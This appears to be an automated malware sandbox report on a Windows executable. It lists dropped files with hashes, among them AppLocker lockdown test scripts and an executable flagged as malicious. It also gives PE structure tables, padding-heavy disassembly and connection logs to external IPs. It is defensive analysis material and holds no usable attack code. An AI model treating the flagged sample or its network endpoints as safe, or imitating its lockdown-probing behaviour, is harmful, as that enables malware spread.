                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Users\user\Desktop\UBONg7lmVR.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):8077824
                                                Entropy (8bit):6.958055025032026
                                                Encrypted:false
                                                SSDEEP:98304:ha48jDV5s44tAbCEAVomRGM6oCRXpqALGFFV/lz8RY5ui2R:haV5s4ZPAunVRZXGxlz8cuF
                                                MD5:A499C507987982C951093E21DF0C0D96
                                                SHA1:FA1A7050198570E016FC4BF3DDD69160E05A8A38
                                                SHA-256:64AAFFE3B4D705B9DDBCE60E8FD8B9829C20438B8C68AE254E185C0F466E0265
                                                SHA-512:0AB3D225FC8901D9CC1719EE61E0CDB444532F8A43B307382E7F3E5D610BCF1D54B5ABEF23649C370E5E960366270D99D94629E47868AE7959522A54D574A27D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 11%
                                                • Antivirus: Virustotal, Detection: 8%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........u......."......~&...................@...........................................`... .............................................. ~.T.............Z.X............0~.......................................................N..............................text...5|&......~&................. ..`.rdata...h'...&..j'...&.............@..@.data.........N.......M.............@....pdata..X.....Z.......Q.............@..@.xdata........[.......R.............@..@/4......).....[.......R.............@..B/19....._.....[.......R.............@..B/32......l....b..n...tY.............@..B/46.....0.....d.......Z.............@..B/65......... d.......Z.............@..B/78.....:.....r.......i.............@..B/90...........{......6r.............@..B.idata..T.... ~.......t.............@....reloc.......0~.......t.............@..B.symtab.......~.......u................B........
                                                Process:C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):19
                                                Entropy (8bit):3.366091329119193
                                                Encrypted:false
                                                SSDEEP:3:hMCE/N:hul
                                                MD5:F92A9EF0567DB794EFBE6CC7D98974CC
                                                SHA1:51728A8A25C4F2805984F294DADCE85E738B90D9
                                                SHA-256:26D96E97CEE88C873CFA14F364E79DAE57265CF8DA97ED1EA65A66A5EC6AD673
                                                SHA-512:14C3C14D4E4D93619C0982BB22BD73930531F510C281BE2E8B1EC6C92F1E1CDCE11AC90F13D8F1F6EE79AAA88711B54AD119A16EE51582A2C6ED4071A5C9684A
                                                Malicious:false
                                                Preview:This is a new file.
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):0.025120815978877453
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:UBONg7lmVR.exe
                                                File size:52'506'624 bytes
                                                MD5:d2db9a159617250a517f9d074ab8f947
                                                SHA1:cdc8efcd77ce4725200f29b9be43dac308a139a1
                                                SHA256:e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e
                                                SHA512:f1fba436f68603ce07314292bb63af326ddf4748d0b622b1da5d76c8880ae7c11c80301b339a847c41adb6d83eb95fb7f60b19385f2dcbd4c611d29017998376
                                                SSDEEP:1536:4no014QhBgKrsMGr5G+slCbUuz2KLj3tC7wjsX/jVh5X6XL5X7r0eHoz:4o014QhBgdACFleksXD5K7ln0hz
                                                TLSH:03B72B24D518FD3ADD1282344439E2EE262E1E40A671CC3EBD587E2E5DB33D43761EA6
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~4..........."...0...!.........n0!.. ...@!...@.. ........................!...........`................................
                                                Icon Hash:2d2e3797b72b0b99
                                                Entrypoint:0x361306e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xBB347EF2 [Thu Jul 11 14:49:22 2069 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:v4.0.30319
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x32130200x4b.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x32140000x19ea.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x32160000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x32110740x32112005a666a826e8dc7814dac7f8ff900a201unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0x32140000x19ea0x1a0069965859e0a13ab7b1284d0e357f31f9False0.3487079326923077data4.665608381406232IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x32160000xc0x200e92f29fd0f22a9375098f27ff47f755dFalse0.044921875MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "!\003\014"0.11836963125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x32141c00x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.5675675675675675
                                                RT_ICON0x32142e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 3200.476878612716763
                                                RT_ICON0x32148500x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.46774193548387094
                                                RT_ICON0x3214b380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 11520.40794223826714804
                                                RT_GROUP_ICON0x32153e00x3edata0.8387096774193549
                                                RT_VERSION0x32154200x3e0data0.35786290322580644
                                                RT_MANIFEST0x32158000x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                DLLImport
                                                mscoree.dll_CorExeMain
                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 27, 2024 13:05:45.394026995 CEST49730443192.168.2.4185.166.143.49
                                                Aug 27, 2024 13:05:45.394107103 CEST44349730185.166.143.49192.168.2.4
                                                Aug 27, 2024 13:05:45.394172907 CEST49730443192.168.2.4185.166.143.49
                                                Aug 27, 2024 13:05:45.435529947 CEST49730443192.168.2.4185.166.143.49
                                                Aug 27, 2024 13:05:45.435585022 CEST44349730185.166.143.49192.168.2.4
                                                Aug 27, 2024 13:05:46.173393011 CEST44349730185.166.143.49192.168.2.4
                                                Aug 27, 2024 13:05:46.173475027 CEST49730443192.168.2.4185.166.143.49
                                                Aug 27, 2024 13:05:46.222939968 CEST49730443192.168.2.4185.166.143.49
                                                Aug 27, 2024 13:05:46.222986937 CEST44349730185.166.143.49192.168.2.4
                                                Aug 27, 2024 13:05:46.223395109 CEST44349730185.166.143.49192.168.2.4
                                                Aug 27, 2024 13:05:46.275208950 CEST49730443192.168.2.4185.166.143.49
                                                Aug 27, 2024 13:05:46.304817915 CEST49730443192.168.2.4185.166.143.49
                                                Aug 27, 2024 13:05:46.352505922 CEST44349730185.166.143.49192.168.2.4
                                                Aug 27, 2024 13:05:46.668823957 CEST44349730185.166.143.49192.168.2.4
                                                Aug 27, 2024 13:05:46.668847084 CEST44349730185.166.143.49192.168.2.4
                                                Aug 27, 2024 13:05:46.668894053 CEST49730443192.168.2.4185.166.143.49
                                                Aug 27, 2024 13:05:46.668915033 CEST44349730185.166.143.49192.168.2.4
                                                Aug 27, 2024 13:05:46.668931961 CEST44349730185.166.143.49192.168.2.4
                                                Aug 27, 2024 13:05:46.668932915 CEST49730443192.168.2.4185.166.143.49
                                                Aug 27, 2024 13:05:46.668979883 CEST49730443192.168.2.4185.166.143.49
                                                Aug 27, 2024 13:05:46.674288034 CEST49730443192.168.2.4185.166.143.49
                                                Aug 27, 2024 13:05:46.700562000 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:46.700592041 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:46.700668097 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:46.701025963 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:46.701041937 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.291929960 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.292009115 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.295285940 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.295295954 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.295646906 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.297153950 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.340513945 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.478629112 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.480726004 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.480747938 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.480808020 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.480818987 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.480851889 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.480875015 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.573137045 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.573163986 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.573213100 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.573282957 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.573307037 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.573323011 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.574982882 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.575006008 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.575058937 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.575064898 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.575093031 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.619652987 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.662957907 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.662978888 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.663018942 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.663062096 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.663072109 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.663104057 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.664659977 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.664683104 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.664724112 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.664729118 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.664763927 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.665704966 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.665767908 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.665777922 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.665810108 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.665837049 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.667526007 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.667583942 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.667588949 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.667608023 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.667639971 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.712704897 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.712708950 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.753611088 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.753632069 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.753683090 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.753688097 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.753729105 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.754143000 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.754163027 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.754193068 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.754196882 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.754221916 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.754426956 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.754483938 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.754496098 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.754506111 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.754555941 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.754559994 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.754980087 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.754998922 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.755050898 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.755054951 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.755675077 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.758446932 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.758466005 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.758517027 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.758521080 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.758552074 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.758568048 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.758570910 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.758892059 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.758913994 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.758946896 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.758951902 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.758979082 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.759344101 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.759392977 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.759402990 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.759413958 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.759458065 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.759462118 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.759661913 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.845818043 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.845838070 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.845966101 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.846014023 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.846040010 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.846060038 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.846076965 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.846087933 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.846123934 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.846128941 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.846247911 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.846266031 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.846301079 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.846306086 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.846330881 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.846584082 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.846606970 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.846642017 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.846646070 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.846673012 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.847214937 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.847259045 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.847296000 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.847301006 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.847325087 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.847341061 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.847362995 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.847367048 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.847381115 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.847413063 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.847420931 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.847441912 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.848052979 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.848064899 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.848149061 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.848156929 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.848227024 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.848246098 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.848304987 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.848310947 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.870588064 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.935028076 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.935044050 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.935101986 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.935139894 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.935147047 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.935178995 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.935365915 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.935395956 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.935431004 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.935435057 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.935462952 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.935662985 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.935705900 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.935744047 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.935750008 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.935777903 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.935794115 CEST49733443192.168.2.452.216.51.233
                                                Aug 27, 2024 13:05:47.935975075 CEST4434973352.216.51.233192.168.2.4
                                                Aug 27, 2024 13:05:47.936007977 CEST4434973352.216.51.233192.168.2.4
